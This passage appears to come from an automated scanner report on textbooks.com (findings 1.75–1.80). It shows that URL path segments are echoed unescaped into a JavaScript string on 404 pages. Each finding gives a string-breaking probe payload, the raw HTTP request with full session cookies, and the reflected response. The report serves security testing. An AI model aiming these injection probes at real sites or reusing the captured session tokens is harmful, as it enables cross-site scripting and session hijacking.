Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/used-textbooks.php3cf2c';2d1207acd60'

</script>
...[SNIP]...

1.75. https://www.textbooks.com/account.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c03ba'%3b65fb45ab654 was submitted in the REST URL parameter 1. This input was echoed as c03ba';65fb45ab654 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.phpc03ba'%3b65fb45ab654 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3627
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:40 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
set() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/account.phpc03ba';65fb45ab654'

</script>
...[SNIP]...

1.76. https://www.textbooks.com/checkout.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad1ee'%3b08fab34f147 was submitted in the REST URL parameter 1. This input was echoed as ad1ee';08fab34f147 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout.phpad1ee'%3b08fab34f147 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:42 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/checkout.phpad1ee';08fab34f147'

</script>
...[SNIP]...

1.77. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd57'%3b52615774397 was submitted in the REST URL parameter 1. This input was echoed as ffd57';52615774397 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssffd57'%3b52615774397/tb-v3.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:09 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/cssffd57';52615774397/tb-v3.css'

</script>
...[SNIP]...

1.78. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63a9b'%3b0e876aee0a7 was submitted in the REST URL parameter 2. This input was echoed as 63a9b';0e876aee0a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tb-v3.css63a9b'%3b0e876aee0a7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/tb-v3.css63a9b';0e876aee0a7'

</script>
...[SNIP]...

1.79. https://www.textbooks.com/js/browse.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d65f'%3b922a7308c1e was submitted in the REST URL parameter 1. This input was echoed as 6d65f';922a7308c1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js6d65f'%3b922a7308c1e/browse.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js6d65f';922a7308c1e/browse.js'

</script>
...[SNIP]...

1.80. https://www.textbooks.com/js/browse.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb610'%3bf73ab7832ba was submitted in the REST URL parameter 2. This input was echoed as cb610';f73ab7832ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/browse.jscb610'%3bf73ab7832ba HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 